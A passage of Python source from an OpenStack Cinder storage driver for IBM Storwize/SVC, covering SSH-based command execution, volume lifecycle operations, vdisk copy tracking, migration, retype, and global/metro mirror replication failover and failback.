1.3.3 - Update driver to use ABC metaclasses
2.0 - Code refactor, split init file and placed shared methods for
FC and iSCSI within the StorwizeSVCCommonDriver class
2.1 - Added replication V2 support to the global/metro mirror
mode
2.1.1 - Update replication to version 2.1
"""
VERSION = "2.1.1"
VDISKCOPYOPS_INTERVAL = 600
GLOBAL = 'global'
METRO = 'metro'
VALID_REP_TYPES = (GLOBAL, METRO)
FAILBACK_VALUE = 'default'
def __init__(self, *args, **kwargs):
super(StorwizeSVCCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(storwize_svc_opts)
self._backend_name = self.configuration.safe_get('volume_backend_name')
self._helpers = StorwizeHelpers(self._run_ssh)
self._vdiskcopyops = {}
self._vdiskcopyops_loop = None
self.protocol = None
self.replication = None
self._state = {'storage_nodes': {},
'enabled_protocols': set(),
'compression_enabled': False,
'available_iogrps': [],
'system_name': None,
'system_id': None,
'code_level': None,
}
self._active_backend_id = kwargs.get('active_backend_id')
        # Storwize supports multiple replication modes; this dictionary
        # maps each replication type to its replication helper.
self.replications = {}
# One driver can be configured with multiple replication targets
# to failover.
self._replication_targets = []
# This boolean is used to indicate whether this driver is configured
# with replication.
self._replication_enabled = False
# This list is used to save the supported replication modes.
self._supported_replication_types = []
        # Storwize cannot accept more than three new SSH connections
        # within one second, so slow down initialization.
        time.sleep(1)
def do_setup(self, ctxt):
"""Check that we have all configuration details from the storage."""
LOG.debug('enter: do_setup')
# Get storage system name, id, and code level
self._state.update(self._helpers.get_system_info())
# Get the replication helpers
self.replication = storwize_rep.StorwizeSVCReplication.factory(self)
# Validate that the pool exists
self._validate_pools_exist()
# Check if compression is supported
self._state['compression_enabled'] = (self._helpers.
compression_enabled())
# Get the available I/O groups
self._state['available_iogrps'] = (self._helpers.
get_available_io_groups())
# Get the iSCSI and FC names of the Storwize/SVC nodes
self._state['storage_nodes'] = self._helpers.get_node_info()
# Add the iSCSI IP addresses and WWPNs to the storage node info
self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
self._helpers.add_fc_wwpns(self._state['storage_nodes'])
# For each node, check what connection modes it supports. Delete any
# nodes that do not support any types (may be partially configured).
to_delete = []
for k, node in self._state['storage_nodes'].items():
if ((len(node['ipv4']) or len(node['ipv6']))
and len(node['iscsi_name'])):
node['enabled_protocols'].append('iSCSI')
self._state['enabled_protocols'].add('iSCSI')
if len(node['WWPN']):
node['enabled_protocols'].append('FC')
self._state['enabled_protocols'].add('FC')
if not len(node['enabled_protocols']):
to_delete.append(k)
for delkey in to_delete:
del self._state['storage_nodes'][delkey]
# Build the list of in-progress vdisk copy operations
if ctxt is None:
admin_context = context.get_admin_context()
else:
admin_context = ctxt.elevated()
volumes = self.db.volume_get_all_by_host(admin_context, self.host)
for volume in volumes:
metadata = self.db.volume_admin_metadata_get(admin_context,
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
self._vdiskcopyops[volume['id']] = ops
# if vdiskcopy exists in database, start the looping call
if len(self._vdiskcopyops) >= 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
LOG.debug('leave: do_setup')
# v2 replication setup
self._do_replication_setup()
def _validate_pools_exist(self):
# Validate that the pool exists
pools = self.configuration.storwize_svc_volpool_name
for pool in pools:
try:
self._helpers.get_pool_attrs(pool)
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.InvalidInput(reason=msg)
def check_for_setup_error(self):
"""Ensure that the flags are set properly."""
LOG.debug('enter: check_for_setup_error')
# Check that we have the system ID information
if self._state['system_name'] is None:
exception_msg = (_('Unable to determine system name.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
if self._state['system_id'] is None:
exception_msg = (_('Unable to determine system id.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
# Make sure we have at least one node configured
if not len(self._state['storage_nodes']):
msg = _('do_setup: No configured nodes.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if self.protocol not in self._state['enabled_protocols']:
# TODO(mc_nair): improve this error message by looking at
# self._state['enabled_protocols'] to tell user what driver to use
raise exception.InvalidInput(
reason=_('The storage device does not support %(prot)s. '
'Please configure the device to support %(prot)s or '
'switch to a driver using a different protocol.')
% {'prot': self.protocol})
required_flags = ['san_ip', 'san_ssh_port', 'san_login',
'storwize_svc_volpool_name']
for flag in required_flags:
if not self.configuration.safe_get(flag):
raise exception.InvalidInput(reason=_('%s is not set.') % flag)
# Ensure that either password or keyfile were set
if not (self.configuration.san_password or
self.configuration.san_private_key):
raise exception.InvalidInput(
reason=_('Password or SSH private key is required for '
'authentication: set either san_password or '
'san_private_key option.'))
opts = self._helpers.build_default_opts(self.configuration)
self._helpers.check_vdisk_opts(self._state, opts)
LOG.debug('leave: check_for_setup_error')
def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
cinder_utils.check_ssh_injection(cmd_list)
command = ' '.join(cmd_list)
if not self.sshpool:
try:
self.sshpool = self._set_up_sshpool(self.configuration.san_ip)
except paramiko.SSHException:
LOG.warning(_LW('Unable to use san_ip to create SSHPool. Now '
'attempting to use storwize_san_secondary_ip '
'to create SSHPool.'))
if self.configuration.storwize_san_secondary_ip is not None:
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
else:
LOG.warning(_LW('Unable to create SSHPool using san_ip '
'and not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
raise
try:
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
except Exception:
            # Before raising, check whether an SSHPool can be created
            # using storwize_san_secondary_ip.
if self.configuration.storwize_san_secondary_ip is not None:
if (self.sshpool.ip ==
self.configuration.storwize_san_secondary_ip):
LOG.warning(_LW("Unable to execute SSH command with "
"storwize_san_secondary_ip. "
"Attempting to switch IP back "
"to san_ip %s."),
self.configuration.san_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.san_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW("Unable to execute SSH command. "
"Attempting to switch IP to %s."),
self.configuration.storwize_san_secondary_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW('Unable to execute SSH command. '
'Not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"),
command)
def _set_up_sshpool(self, ip):
password = self.configuration.san_password
privatekey = self.configuration.san_private_key
min_size = self.configuration.ssh_min_pool_conn
max_size = self.configuration.ssh_max_pool_conn
sshpool = ssh_utils.SSHPool(
ip,
self.configuration.san_ssh_port,
self.configuration.ssh_conn_timeout,
self.configuration.san_login,
password=password,
privatekey=privatekey,
min_size=min_size,
max_size=max_size)
return sshpool
    def _ssh_execute(self, sshpool, command,
                     check_exit_code=True, attempts=1):
        try:
            with sshpool.item() as ssh:
                last_exception = None
                while attempts > 0:
                    attempts -= 1
                    try:
                        return processutils.ssh_execute(
                            ssh,
                            command,
                            check_exit_code=check_exit_code)
                    except Exception as e:
                        LOG.error(_LE('Error has occurred: %s'), e)
                        last_exception = e
                        greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"), command)
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_LE('ensure_export: Volume %s not found on storage.'),
volume['name'])
def create_export(self, ctxt, volume, connector):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def _get_vdisk_params(self, type_id, volume_type=None,
volume_metadata=None):
return self._helpers.get_vdisk_params(self.configuration,
self._state, type_id,
volume_type=volume_type,
volume_metadata=volume_metadata)
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
model_update = None
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
model_update = {'replication_status': 'enabled'}
elif opts.get('replication'):
model_update = self.replication.create_replica(ctxt, volume)
return model_update
def delete_volume(self, volume):
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).delete_target_volume(
volume)
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
pool = utils.extract_host(source_vol['host'], 'pool')
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False, pool=pool)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True, pool=pool)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, volume)
if replica_status:
return replica_status
def create_cloned_volume(self, tgt_volume, src_volume):
"""Creates a clone of the specified volume."""
if src_volume['size'] > tgt_volume['size']:
msg = (_("create_cloned_volume: source volume %(src_vol)s "
"size is %(src_size)dGB and doesn't fit in target "
"volume %(tgt_vol)s of size %(tgt_size)dGB.") %
{'src_vol': src_volume['name'],
'src_size': src_volume['size'],
'tgt_vol': tgt_volume['name'],
'tgt_size': tgt_volume['size']})
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(tgt_volume['volume_type_id'],
volume_metadata=
tgt_volume.get('volume_metadata'))
pool = utils.extract_host(tgt_volume['host'], 'pool')
self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
src_volume['id'], self.configuration,
opts, True, pool=pool)
        # The source volume size equals the target volume size in most
        # cases, but the target may be bigger. SVC does not support
        # FlashCopy between two volumes of different sizes, so the
        # target volume is first created with the source volume's size
        # and then extended to the requested size.
        if tgt_volume['size'] > src_volume['size']:
            # Extend the newly created target volume to the expected size.
            self._extend_volume_op(tgt_volume, tgt_volume['size'],
                                   src_volume['size'])
if opts['qos']:
self._helpers.add_vdisk_qos(tgt_volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, tgt_volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(
ctxt, tgt_volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, tgt_volume)
if replica_status:
return replica_status
def extend_volume(self, volume, new_size):
self._extend_volume_op(volume, new_size)
def _extend_volume_op(self, volume, new_size, old_size=None):
LOG.debug('enter: _extend_volume_op: volume %s', volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('_extend_volume_op: Extending a volume with snapshots is '
'not supported.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if old_size is None:
old_size = volume['size']
extend_amt = int(new_size) - old_size
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
target_vol_name = None
        if rep_mirror_type and rep_status != "failed-over":
            try:
                rel_info = self._helpers.get_relationship_info(volume)
                self._helpers.delete_relationship(volume)
            except Exception as e:
                msg = (_('Failed to get remote copy information for '
                         '%(volume)s. Exception: %(err)s.') %
                       {'volume': volume['id'], 'err': e})
                LOG.error(msg)
                raise exception.VolumeDriverException(message=msg)
if rel_info:
target_vol_name = rel_info.get('aux_vdisk_name')
self.replications.get(rep_mirror_type).extend_target_volume(
target_vol_name, extend_amt)
self._helpers.extend_vdisk(volume['name'], extend_amt)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).create_relationship(
volume, target_vol_name)
LOG.debug('leave: _extend_volume_op: volume %s', volume['id'])
def add_vdisk_copy(self, volume, dest_pool, vol_type):
return self._helpers.add_vdisk_copy(volume, dest_pool,
vol_type, self._state,
self.configuration)
    def _add_vdisk_copy_op(self, ctxt, volume, new_op):
        metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
                                                     volume['id'])
        curr_ops = metadata.get('vdiskcopyops', None)
        if curr_ops:
            curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
            # list.append() returns None, so mutate the list in place and
            # reuse it instead of assigning append()'s return value.
            curr_ops_list.append(new_op)
            new_ops_list = curr_ops_list
        else:
            new_ops_list = [new_op]
        new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
        self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
                                             {'vdiskcopyops': new_ops_str},
                                             False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
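    # The 'vdiskcopyops' admin metadata written above is a ';'-separated
    # list of 'orig_copy_id:new_copy_id' pairs, e.g. (hypothetical)
    # '0:1;0:2' for two pending copy operations on the same volume.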
def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
try:
self._vdiskcopyops[volume['id']].remove((orig_copy_id,
new_copy_id))
if not len(self._vdiskcopyops[volume['id']]):
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
except KeyError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %s does not have any '
'registered vdisk copy operations.'), volume['id'])
return
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s does not have '
'the specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if not curr_ops:
LOG.error(_LE('_rm_vdisk_copy_op: Volume metadata %s does not '
'have any registered vdisk copy operations.'),
volume['id'])
return
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
try:
curr_ops_list.remove((orig_copy_id, new_copy_id))
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s metadata does '
'not have the specified vdisk copy operation: '
'orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
if len(curr_ops_list):
new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
else:
self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
'vdiskcopyops')
def promote_replica(self, ctxt, volume):
return self.replication.promote_replica(volume)
def reenable_replication(self, ctxt, volume):
return self.replication.reenable_replication(volume)
    def create_replica_test_volume(self, tgt_volume, src_volume):
        if src_volume['size'] != tgt_volume['size']:
            msg = (_('create_replica_test_volume: Source and destination '
                     'size differ.'))
            LOG.error(msg)
            raise exception.InvalidInput(message=msg)
replica_status = self.replication.test_replica(tgt_volume,
src_volume)
return replica_status
def get_replication_status(self, ctxt, volume):
replica_status = None
if self.replication:
replica_status = self.replication.get_replication_status(volume)
return replica_status
def _check_volume_copy_ops(self):
LOG.debug("Enter: update volume copy status.")
ctxt = context.get_admin_context()
copy_items = list(self._vdiskcopyops.items())
for vol_id, copy_ops in copy_items:
try:
volume = self.db.volume_get(ctxt, vol_id)
except Exception:
LOG.warning(_LW('Volume %s does not exist.'), vol_id)
del self._vdiskcopyops[vol_id]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
continue
for copy_op in copy_ops:
try:
synced = self._helpers.is_vdisk_copy_synced(volume['name'],
copy_op[1])
except Exception:
LOG.info(_LI('_check_volume_copy_ops: Volume %(vol)s does '
'not have the specified vdisk copy '
'operation: orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': copy_op[0],
'new': copy_op[1]})
else:
if synced:
self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
copy_op[1])
LOG.debug("Exit: update volume copy status.")
# #### V2.1 replication methods #### #
def failover_host(self, context, volumes, secondary_id=None):
"""Force failover to a secondary replication target."""
self._validate_replication_enabled()
if self.FAILBACK_VALUE == secondary_id:
# In this case the administrator would like to fail back.
volume_update_list = self._replication_failback(context,
volumes)
return None, volume_update_list
# In this case the administrator would like to fail over.
failover_target = None
for target in self._replication_targets:
if target['backend_id'] == secondary_id:
failover_target = target
break
if not failover_target:
msg = _("A valid secondary target MUST be specified in order "
"to failover.")
LOG.error(msg)
raise exception.InvalidReplicationTarget(reason=msg)
target_id = failover_target['backend_id']
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(context, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication.target.get('backend_id') == target_id:
# Check if the target backend matches the replication type.
# If so, fail over the volume.
try:
replication.failover_volume_host(context,
volume, target_id)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'failed-over'}})
except exception.VolumeDriverException:
msg = (_LE('Unable to failover to the secondary. '
'Please make sure that the secondary '
'back-end is ready.'))
LOG.error(msg)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'error'}})
else:
# If the volume is not of replicated type, we need to
# force the status into error state so a user knows they
# do not have access to the volume.
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'error'}})
return target_id, volume_update_list
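    # failover_host returns a (target_id, volume_update_list) tuple,
    # e.g. (hypothetical values):
    #   ('svc_backend_2',
    #    [{'volume_id': 'f0e1...', 'updates':
    #      {'replication_status': 'failed-over'}}])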
def _is_host_ready_for_failback(self, ctxt, volumes):
valid_sync_status = ('consistent_synchronized', 'consistent_stopped',
'synchronized', 'idling')
# Check the status of each volume to see if it is in
# a consistent status.
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication:
status = replication.get_relationship_status(volume)
                    # We need to make sure that all the volumes are
                    # in a valid status to trigger a successful
                    # fail-back. False will be returned even if only
                    # one volume is not ready.
if status not in valid_sync_status:
return False
else:
return False
else:
return False
return True
    def _replication_failback(self, ctxt, volumes):
        """Fail back all the volumes on the secondary backend."""
        if not self._is_host_ready_for_failback(ctxt, volumes):
            msg = _("The host is not ready to be failed back. Please "
                    "resynchronize the volumes and resume replication on the "
                    "Storwize backends.")
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
replication.replication_failback(volume)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'enabled'}})
else:
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'available'}})
return volume_update_list
def _validate_replication_enabled(self):
if not self._replication_enabled:
msg = _("Issuing a fail-over failed because replication is "
"not properly configured.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
    def _validate_volume_rep_type(self, ctxt, volume):
        rep_type = self._get_volume_replicated_type(ctxt, volume)
        if not rep_type:
            msg = (_("Volume %s is not of replicated type. "
                     "This volume needs to be of a volume type "
                     "with the extra spec replication_enabled set "
                     "to '<is> True' to support replication "
                     "actions.") % volume['id'])
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
if not self._replication_enabled:
msg = _("The back-end where the volume is created "
"does not have replication enabled.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return rep_type
def _get_volume_replicated_type_mirror(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type in self.VALID_REP_TYPES:
return rep_type
else:
return None
def _get_specs_replicated_type(self, volume_type):
replication_type = None
extra_specs = volume_type.get("extra_specs", {})
rep_val = extra_specs.get('replication_enabled')
if rep_val == "<is> True":
replication_type = extra_specs.get('replication_type',
self.GLOBAL)
            # When present, the replication_type extra spec has the
            # form '<in> global' or '<in> metro'; when absent we fall
            # back to the default (global) directly.
            if replication_type != self.GLOBAL:
                # Strip the '<in>' prefix to get the bare type.
                replication_type = replication_type.split()[1]
            if replication_type not in self.VALID_REP_TYPES:
                replication_type = None
return replication_type
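    # Illustrative volume-type extra specs (hypothetical) that would
    # select metro-mirror replication via the method above:
    #   {'replication_enabled': '<is> True',
    #    'replication_type': '<in> metro'}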
def _get_volume_replicated_type(self, ctxt, volume):
replication_type = None
if volume.get("volume_type_id"):
volume_type = volume_types.get_volume_type(
ctxt, volume["volume_type_id"])
replication_type = self._get_specs_replicated_type(volume_type)
return replication_type
def _do_replication_setup(self):
replication_devices = self.configuration.replication_device
if replication_devices:
replication_targets = []
for dev in replication_devices:
remote_array = {}
remote_array['managed_backend_name'] = (
dev.get('managed_backend_name'))
if not remote_array['managed_backend_name']:
raise exception.InvalidConfigurationValue(
option='managed_backend_name',
value=remote_array['managed_backend_name'])
rep_mode = dev.get('replication_mode')
remote_array['replication_mode'] = rep_mode
remote_array['san_ip'] = (
dev.get('san_ip'))
remote_array['backend_id'] = (
dev.get('backend_id'))
remote_array['san_login'] = (
dev.get('san_login'))
remote_array['san_password'] = (
dev.get('san_password'))
remote_array['pool_name'] = (
dev.get('pool_name'))
replication_targets.append(remote_array)
            # Each replication type has a corresponding replication helper.
self.create_replication_types(replication_targets)
if len(self._supported_replication_types) > 0:
self._replication_enabled = True
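    # Illustrative cinder.conf entry (hypothetical values) matching the
    # replication_device parsing above:
    #   replication_device = backend_id:svc_backend_2,
    #       replication_mode:global,
    #       managed_backend_name:host@svc_backend_2#pool2,
    #       san_ip:192.168.0.2,san_login:admin,san_password:secret,
    #       pool_name:pool2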
def create_replication_types(self, replication_targets):
for target in replication_targets:
rep_type = target['replication_mode']
if (rep_type in self.VALID_REP_TYPES
and rep_type not in self.replications.keys()):
replication = self.replication_factory(rep_type, target)
                try:
                    replication.establish_target_partnership()
                except exception.VolumeDriverException:
                    LOG.error(_LE('The replication mode %(type)s has not '
                                  'successfully established partnership '
                                  'with the replica Storwize target '
                                  '%(stor)s.'),
                              {'type': rep_type,
                               'stor': target['backend_id']})
                    continue
self.replications[rep_type] = replication
self._replication_targets.append(target)
self._supported_replication_types.append(rep_type)
def replication_factory(self, replication_type, rep_target):
"""Use replication methods for the requested mode."""
if replication_type == self.GLOBAL:
return storwize_rep.StorwizeSVCReplicationGlobalMirror(
self, rep_target, StorwizeHelpers)
if replication_type == self.METRO:
return storwize_rep.StorwizeSVCReplicationMetroMirror(
self, rep_target, StorwizeHelpers)
def migrate_volume(self, ctxt, volume, host):
"""Migrate directly if source and dest are managed by same storage.
We create a new vdisk copy in the desired pool, and add the original
vdisk copy to the admin_metadata of the volume to be deleted. The
deletion will occur using a periodic task once the new copy is synced.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
false_ret = (False, None)
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return false_ret
ctxt = context.get_admin_context()
volume_type_id = volume['volume_type_id']
if volume_type_id is not None:
vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
else:
vol_type = None
self._check_volume_copy_ops()
new_op = self.add_vdisk_copy(volume['name'], dest_pool, vol_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = no_copy_keys + copy_keys
        old_opts = self._get_vdisk_params(volume['volume_type_id'],
                                          volume_metadata=
                                          volume.get('volume_metadata'))
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
# Check if retype affects volume replication
model_update = None
old_type_replication = old_opts.get('replication', False)
new_type_replication = new_opts.get('replication', False)
# Delete replica if needed
if old_type_replication and not new_type_replication:
self.replication.delete_replica(volume)
model_update = {'replication_status': 'disabled',
'replication_driver_data': None,
'replication_extended_status': None}
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
if (utils.extract_host(volume['host'], 'pool') !=
utils.extract_host(host['host'], 'pool')):
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
            # If the volume is replicated, a copy operation is not allowed.
            if new_type_replication:
                msg = (_('Unable to retype: Current action needs volume-copy,'
                         ' it is not allowed when new type is replication.'
                         ' Volume = %s') % volume['id'])
                raise exception.VolumeDriverException(message=msg)
retype_iogrp_property(volume,
new_opts['iogrp'],
old_opts['iogrp'])
try:
new_op = self.add_vdisk_copy(volume['name'],
dest_pool,
new_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
            except exception.VolumeDriverException:
                # Roll back the iogrp property change.
                retype_iogrp_property(volume, old_opts['iogrp'],
                                      new_opts['iogrp'])
                msg = (_('Unable to retype: A copy of volume %s exists. '
                         'Retyping would exceed the limit of 2 copies.') %
                       volume['id'])
                raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
if new_opts['qos']:
# Add the new QoS setting to the volume. If the volume has an
# old QoS setting, it will be overwritten.
self._helpers.update_vdisk_qos(volume['name'], new_opts['qos'])
elif old_opts['qos']:
# If the old_opts contain QoS keys, disable them.
self._helpers.disable_vdisk_qos(volume['name'], old_opts['qos'])
# Add replica if needed
if not old_type_replication and new_type_replication:
model_update = self.replication.create_replica(ctxt, volume,
new_type)
        LOG.debug('exit: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True, model_update
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update from Storwize for migrated volume.
This method should rename the back-end volume name(id) on the
destination host back to its original name(id) on the source host.
:param ctxt: The context used to run the method update_migrated_volume
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:returns: model_update to update DB with any needed changes
"""
current_name = CONF.volume_name_template % new_volume['id']
original_volume_name = CONF.volume_name_template % volume['id']
try:
self._helpers.rename_vdisk(current_name, original_volume_name)
except exception.VolumeBackendAPIException:
